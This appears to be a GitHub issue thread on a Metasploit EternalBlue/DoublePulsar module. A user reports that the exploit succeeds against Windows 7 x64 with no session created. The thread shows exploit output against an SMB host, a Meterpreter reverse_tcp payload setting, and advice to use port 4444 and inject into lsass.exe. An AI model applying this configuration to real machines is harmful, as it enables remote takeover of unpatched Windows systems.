Telefonica / Eternalblue-Doublepulsar-Metasploit

Module of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar.
GNU Lesser General Public License v2.1
1.09k stars 520 forks source link

Kali armitage can't create session for win7. #29

Open petermax2020 opened 7 years ago

petermax2020 commented 7 years ago

i've use Eternalblue-Doublepulsar to exploit windows XP and armitage(in Kali) works good, but it doesn't work for windows 7 x64. The metasploit also can works good,but the armitage send me this error: msf〉..... ...... [] 192.168.1.150:445 - Launching Eternalblue... [+] 192.168.1.150:445 - Pwned! Eternalblue success! [] 192.168.1.150:445 - Launching Doublepulsar... [+] 192.168.1.150:445 - Remote code executed... 3... 2... 1... [] Exploit completed, but no session was created.

of course, I set the following options. set payload windows/x64/meterpreter/reverse_tcp

RubyistCTRLDYT commented 7 years ago

Set the port to 4444and process inject to lsass. exe

ghefary commented 7 years ago

how can i set payload win/x64/meterpreter/rev_tcp on armitage interface !!!! ican't find this option